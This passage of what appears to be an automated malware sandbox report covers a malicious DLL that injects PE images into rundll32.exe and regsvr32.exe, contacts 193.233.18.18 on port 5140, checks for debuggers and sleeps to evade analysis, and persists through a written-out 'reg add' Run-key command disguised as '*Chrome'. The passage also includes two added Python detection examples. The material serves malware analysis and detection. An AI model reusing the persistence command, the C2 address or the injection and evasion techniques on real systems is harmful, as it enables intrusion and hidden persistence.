              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B5C97E push eax; retf 12_2_02B5C981
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B34E56 push ecx; ret 12_2_02B34E69
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A57106 push ecx; ret 15_2_02A57119
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A5B11B push esp; ret 15_2_02A5B141
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A57A28 push eax; ret 15_2_02A57A46
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A34E56 push ecx; ret 15_2_02A34E69
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B06EB0 ShellExecuteW,URLDownloadToFileW,12_2_02B06EB0
              Source: C:\Windows\SysWOW64\rundll32.exe | File created: C:\Users\user\AppData\Roaming\VIVA_01.dll (dropped file)

              Boot Survival

              Source: C:\Windows\SysWOW64\reg.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run *Chrome
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_02B1AA4A
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1CB50 LoadLibraryA/GetProcAddress/GetModuleHandleA resolution chain (same function as listed above)
              Source: C:\Windows\SysWOW64\rundll32.exe, C:\Windows\SysWOW64\cmd.exe, C:\Windows\System32\conhost.exe, C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (reported once per process; repeated for every rundll32.exe instance)
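Two things in this section and the process list above are worth turning into a detection rather than just recording. The persistence entry is written under HKCU, so it needs no elevation, its value name is *Chrome, and its data launches rundll32.exe against a DLL in %APPDATA% by a named export; the asterisk prefix is what Microsoft documents for RunOnce values as "run even in Safe Mode", and it also makes the entry look like a Chrome component. The payload stage, meanwhile, spawns rundll32.exe (and regsvr32.exe) with no command line at all, which does nothing by itself and only makes sense as a host process to write code into. (The System32 rundll32.exe re-launching the SysWOW64 one with the same arguments is normal: 64-bit rundll32 hands a 32-bit DLL to its WOW64 counterpart.) The Python below is an added example, not part of the Joe Sandbox report or of any product: it tokenises constructed process-creation events modelled on the lines above and applies rules for rundll32 without arguments, rundll32 loading from a user-writable directory, and a reg add to Run/RunOnce whose payload is a LOLBin pointed at a user-writable path or whose value name carries the asterisk. Rule names, the directory list and the sample events are this example's own choices.

```python
"""Triage of the rundll32 process tree and Run-key write seen in the report.

Added example, not part of the Joe Sandbox report. The events below are
constructed to mirror the report's "Process created" lines; rule names,
directory list and sample events are this example's own choices.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Directories a standard user can write to: a DLL handed to rundll32 from
# one of these deserves attention, one under C:\Windows usually does not.
USER_WRITABLE = re.compile(
    r"(?i)\\(?:AppData|Temp|Desktop|Downloads|Users\\Public|ProgramData)\\")
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\Run(?:Once)?\b")
LOLBIN = re.compile(r"(?i)\b(?:rundll32|regsvr32|mshta|wscript|cscript)\.exe\b")


@dataclass(frozen=True)
class ProcEvent:
    parent: str    # parent image path
    image: str     # child image path
    cmdline: str   # child command line as logged


def tokens(cmdline: str) -> list[str]:
    """Split a Windows command line, keeping quoted paths whole and unquoting them."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def reg_add_fields(toks: list[str]) -> tuple[str, str, str] | None:
    """Return (key, value_name, data) for a 'reg add' invocation, else None."""
    starts = [i for i in range(len(toks) - 1)
              if toks[i].lower() == "reg" and toks[i + 1].lower() == "add"]
    if not starts:
        return None
    i = starts[0]
    key = toks[i + 2] if i + 2 < len(toks) else ""
    value = data = ""
    for j in range(i + 3, len(toks) - 1):
        if toks[j].lower() == "/v":
            value = toks[j + 1]
        elif toks[j].lower() == "/d":
            data = toks[j + 1]
            # cmd passes `"...\x.dll",EntryPoint` as one argument: re-join the tail
            if j + 2 < len(toks) and toks[j + 2].startswith(","):
                data += toks[j + 2]
    return key, value, data


def triage(ev: ProcEvent) -> list[str]:
    """Return the rule names the event trips (empty list = nothing of note)."""
    flags: list[str] = []
    toks = tokens(ev.cmdline)
    img = basename(ev.image)
    # rundll32 with no DLL and no entry point only makes sense as an injection host
    if img == "rundll32.exe" and len(toks) == 1:
        flags.append("rundll32_no_args")
    # rundll32 told to load its DLL from a user-writable directory
    if img == "rundll32.exe" and len(toks) > 1 and USER_WRITABLE.search(ev.cmdline):
        flags.append("rundll32_user_path_dll")
    # Run / RunOnce write whose payload is a LOLBin pointed at a user path
    fields = reg_add_fields(toks)
    if fields and RUN_KEY.search(fields[0]):
        _key, value, data = fields
        if LOLBIN.search(data) and USER_WRITABLE.search(data):
            flags.append("run_key_lolbin_user_path")
        if value.startswith("*"):   # documented for RunOnce as "run even in Safe Mode"
            flags.append("run_value_asterisk")
    return flags


# Constructed sample modelled on the report's process tree (not copied logs)
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r'rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1'),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\cmd.exe",
              r'cmd.exe /C reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" '
              r'/v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f & exit'),
    ProcEvent(r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r'"C:\Windows\SysWOW64\rundll32.exe"'),
    ProcEvent(r"C:\Windows\System32\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe",
              r'"C:\Windows\system32\rundll32.exe" C:\Users\user\AppData\Roaming\VIVA_01.dll,EntryPoint'),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",   # benign control
              r'"C:\Windows\system32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL'),
]


def triage_all(events=SAMPLE_EVENTS) -> dict[str, list[str]]:
    """Map each command line to the rules it trips."""
    return {ev.cmdline: triage(ev) for ev in events}


if __name__ == "__main__":
    for cmd, flags in triage_all().items():
        print(f"{flags or ['-']}  {cmd}")
```

The rules deliberately key on the image path and the tokenised command line rather than on the DLL name, so they still fire when the dropped file is renamed; the benign control event (rundll32 loading shell32.dll from System32 with a real export) trips nothing.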

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0F7A7 Sleep,ExitProcess,12_2_02B0F7A7
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0F7A7 Sleep,ExitProcess,15_2_02A0F7A7
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,12_2_02B1A748
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,15_2_02A1A748
              Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 7662
              Source: C:\Windows\SysWOW64\rundll32.exe | Window / User API: threadDelayed 2324
              Source: C:\Windows\SysWOW64\rundll32.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\VIVA_01.dll
              Source: C:\Windows\SysWOW64\rundll32.exe | API coverage: 9.6 %
              Source: C:\Windows\SysWOW64\regsvr32.exe | API coverage: 6.2 %
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 8036 | Thread sleep count: 7662 > 30
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 8036 | Thread sleep time: -22986000s >= -30000s
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 8036 | Thread sleep count: 2324 > 30
              Source: C:\Windows\SysWOW64\rundll32.exe TID: 8036 | Thread sleep time: -6972000s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_02B1C291
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B09253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_02B09253
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_02B0C34D
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B09665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_02B09665
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B19AF5 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_02B19AF5
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_02B0BB30
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0783C FindFirstFileW,FindNextFileW,12_2_02B0783C
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_02B0880C
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B0BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,12_2_02B0BD37
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A1C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_02A1C291
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A09253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_02A09253
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_02A0C34D
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A09665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_02A09665
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A19AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_02A19AF5
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_02A0BB30
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0783C FindFirstFileW,FindNextFileW,15_2_02A0783C
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_02A0880C
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A0BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_02A0BD37
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B07C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,12_2_02B07C97
              Source: C:\Windows\SysWOW64\rundll32.exe | API call chain: ExitProcess graph end node | graph_12-48249
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B3BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02B3BB22
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1CB50 LoadLibraryA/GetProcAddress/GetModuleHandleA resolution chain (same function as listed above)
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B432B5 mov eax, dword ptr fs:[00000030h] 12_2_02B432B5
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A432B5 mov eax, dword ptr fs:[00000030h] 15_2_02A432B5
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B12077 GetProcessHeap,HeapFree,12_2_02B12077
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B3BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02B3BB22
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B34B47 SetUnhandledExceptionFilter,12_2_02B34B47
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_02B349F9
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B34FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_02B34FDC
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A3BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_02A3BB22
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A34B47 SetUnhandledExceptionFilter,15_2_02A34B47
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_02A349F9
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 15_2_02A34FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_02A34FDC

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 193.233.18.18 port 5140
              Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\SysWOW64\regsvr32.exe base: 2A00000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 2B00000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 2B40000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 8F0000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 520000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 2A40000 value starts with: 4D5A
              Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 2A90000 value starts with: 4D5A
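The "Memory written ... value starts with: 4D5A" entries above record MZ-headed buffers being written into rundll32.exe and regsvr32.exe at private allocations such as 0x2A00000 and 0x2B00000, which is what a manually mapped payload looks like from outside the process. The following Python is an added example, not code from the Joe Sandbox report or from the sample, of how a responder can validate such a region once it has been dumped: it parses the DOS and NT headers, checks that the PE32 structure is internally consistent (e_lfanew in range, "PE\0\0" signature, PE32 optional-header magic, section table inside the buffer), and flags any parsable image that sits in MEM_PRIVATE rather than MEM_IMAGE memory, using the Type values VirtualQuery reports. The region table and the PE bytes inside it are constructed for the example; only the region bases are borrowed from the report.

```python
"""Validate PE images carved from process-memory regions.
Added example (not from the report, Joe Sandbox or the sample): the region table and the
PE bytes are constructed; only the region bases are borrowed from the report."""
import struct
from dataclasses import dataclass

IMAGE_DOS_SIGNATURE = 0x5A4D            # "MZ"
IMAGE_NT_SIGNATURE = 0x00004550         # "PE\0\0"
IMAGE_FILE_MACHINE_I386 = 0x014C
IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_SCN_MEM_EXECUTE = 0x20000000
MEM_PRIVATE, MEM_IMAGE = 0x20000, 0x1000000   # MEMORY_BASIC_INFORMATION.Type

@dataclass
class Region:
    base: int
    mem_type: int        # MEM_PRIVATE or MEM_IMAGE, as VirtualQuery reports it
    data: bytes

@dataclass
class PeInfo:
    machine: int
    image_base: int
    entry_point_rva: int
    sections: list       # (name, virtual_address, characteristics)

def parse_pe(data: bytes):
    """Return PeInfo if `data` starts with a consistent PE32 image, else None."""
    if len(data) < 0x40 or struct.unpack_from("<H", data, 0)[0] != IMAGE_DOS_SIGNATURE:
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 4 + 20 + 96 > len(data):       # signature + file header + minimal optional header
        return None
    if struct.unpack_from("<I", data, e_lfanew)[0] != IMAGE_NT_SIGNATURE:
        return None
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        return None
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    sections = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        if off + 40 > len(data):
            return None                      # section table runs past the region: not a real image
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        va, chars = struct.unpack_from("<I", data, off + 12)[0], struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, va, chars))
    return PeInfo(machine, image_base, entry_rva, sections)

def find_injected_images(regions):
    """A parsable PE in MEM_PRIVATE memory has no file backing: the signature of
    manual mapping / reflective loading. PEs in MEM_IMAGE are normally loaded modules."""
    hits = []
    for r in regions:
        info = parse_pe(r.data)
        if info is None or r.mem_type == MEM_IMAGE:
            continue
        hits.append({"base": r.base, "preferred_base": info.image_base,
                     "relocated": info.image_base != r.base,
                     "entry": r.base + info.entry_point_rva,
                     "exec_sections": [n for n, _, c in info.sections if c & IMAGE_SCN_MEM_EXECUTE]})
    return hits

def build_sample_pe(image_base: int = 0x10000000) -> bytes:
    """Constructed header-only PE32 used as test input (not the analysed sample)."""
    e_lfanew = 0x80
    dos = (b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    file_hdr = struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_I386, 2, 0, 0, 0, 0xE0, 0x2102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    struct.pack_into("<I", opt, 16, 0x1000)      # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, image_base)  # ImageBase
    def section(name, va, chars):
        s = bytearray(40)
        s[0:8] = name.ljust(8, b"\0")
        struct.pack_into("<II", s, 12, va, 0)    # VirtualAddress, SizeOfRawData
        struct.pack_into("<I", s, 36, chars)
        return bytes(s)
    return (dos + b"PE\0\0" + file_hdr + bytes(opt)
            + section(b".text", 0x1000, 0x60000020) + section(b".data", 0x2000, 0xC0000040))

SAMPLE_REGIONS = [  # constructed; bases taken from the "Memory written" entries above
    Region(0x2A00000, MEM_PRIVATE, build_sample_pe()),
    Region(0x2B00000, MEM_PRIVATE, build_sample_pe()),
    Region(0x10000000, MEM_IMAGE, build_sample_pe()),       # a legitimately mapped module
    Region(0x520000, MEM_PRIVATE, b"MZ" + b"\0" * 64),       # MZ bytes without a PE header
]

if __name__ == "__main__":
    for hit in find_injected_images(SAMPLE_REGIONS):
        print(hit)
```

The "relocated" flag is the detail worth keeping: a payload written at 0x2A00000 whose header asks for a different ImageBase must either carry relocations that the loader applied or have been patched, and the entry address (base plus AddressOfEntryPoint) is where to set a breakpoint or start disassembly. Regions that merely begin with "MZ" but have no coherent NT header, like the 0x520000 entry in the constructed table, are reported as nothing, which avoids chasing string artefacts.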
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 12_2_02B120F7
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 15_2_02A120F7
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B19627 mouse_event | 12_2_02B19627
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\7P7cuKWTfN.dll",#1
              Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\SysWOW64\regsvr32.exe"
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "*Chrome" /t REG_SZ /d "rundll32.exe C:\Users\user\AppData\Roaming\VIVA_01.dll",EntryPoint /f
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: AllocateAndInitializeSid()..\..\Code\Win32\ECWindowsSecurity.cppOpenThreadTokenOpenProcessTokenProcessIdToSessionIdProcessIdToSessionId() not found in kernel32.dllProcessIdToSessionIdFailed to find WTSGetActiveConsoleSessionId() in kernel32.dllWTSGetActiveConsoleSessionIdEqualSidAllocateAndInitializeSidGetTokenInformationAdjustTokenPrivilegesLookupPrivilegeValueLogged on user process found: process id = %d, process name = %s account name = %s, domain name = %s::LookupAccountSid() failed, process id = %d, last error = %d::GetTokenInformation() failed, process id = %d, last error = %d::OpenProcessToken() failed, process id = %d, last error = %d::OpenProcess(%d) failed, last error = %dWTSQueryUserTokenSeTcbPrivilegeFailed to load and initialize the WTSApi32 library.::IsTokenRestricted()Failed to allocate buffer for the token information structureGetTokenInformation()::OpenDesktop(%s) failed, last error = %dFailed to open WinSta0, last error = %dWinSta0explorer.exeProgmanDuplicateTokenExFailed to open process id %uFailed to open process token for process id %uECWindowsSecurity::getLoggedOnUserToken_ThisWTSSession()RevertToSelf()ImpersonateLoggedOnUser()Unable to aquire user token for impersonation%s - already impersonatingECImpersonator::start()%s - The start method was never invoked for this ECImpersonator object.ECImpersonator::~ECImpersonator()
              Source: loaddll32.exe, 00000000.00000002.2240153641.0000000003090000.00000004.00001000.00020000.00000000.sdmp, loaddll32.exe, 00000000.00000002.2244516010.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp, regsvr32.exe, 00000003.00000002.2231228469.0000000010BE4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: BaseBarShell_TrayWndMicrosoft Office Excelexcel.exeMicrosoft Office PowerPointpowerpnt.exeCSharingModeApp::prepareChosenAppWindowsToBeShown BringWindowToTop failed.CSharingModeApp::prepareChosenAppWindowsToBeShown attempt to share empty rectangle.Q
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B34C52 cpuid | 12_2_02B34C52
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoA | 12_2_02B0F8D1
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW | 12_2_02B52313
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 12_2_02B520C3
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW | 12_2_02B52036
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 12_2_02B52610
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 12_2_02B5243C
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW | 12_2_02B48404
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW | 12_2_02B52543
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetLocaleInfoW | 12_2_02B488ED
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW | 12_2_02B51F9B
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: EnumSystemLocalesW | 12_2_02B51F50
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 12_2_02B51CD8
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW | 15_2_02A52313
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW | 15_2_02A520C3
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: EnumSystemLocalesW | 15_2_02A52036
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 15_2_02A52610
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 15_2_02A5243C
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: EnumSystemLocalesW | 15_2_02A48404
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW | 15_2_02A52543
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoW | 15_2_02A488ED
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: GetLocaleInfoA | 15_2_02A0F8D1
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: EnumSystemLocalesW | 15_2_02A51F9B
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: EnumSystemLocalesW | 15_2_02A51F50
              Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 15_2_02A51CD8
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B04F51 GetLocalTime,CreateEventA,CreateThread | 12_2_02B04F51
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B1B60D GetComputerNameExW,GetUserNameW | 12_2_02B1B60D
              Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 12_2_02B493AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 12_2_02B493AD

              Stealing of Sensitive Information

              Source: Yara matchFile source: 17.2.rundll32.exe.8f0000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.4240000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 15.2.regsvr32.exe.2a00000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.loaddll32.exe.10ec85b6.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 4.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.rundll32.exe.5330000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 3.2.regsvr32.exe.5990000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.3850000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.rundll32.exe.2b00000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.rundll32.exe.10ec85b6.3.unpack, type: UNPACKEDPE
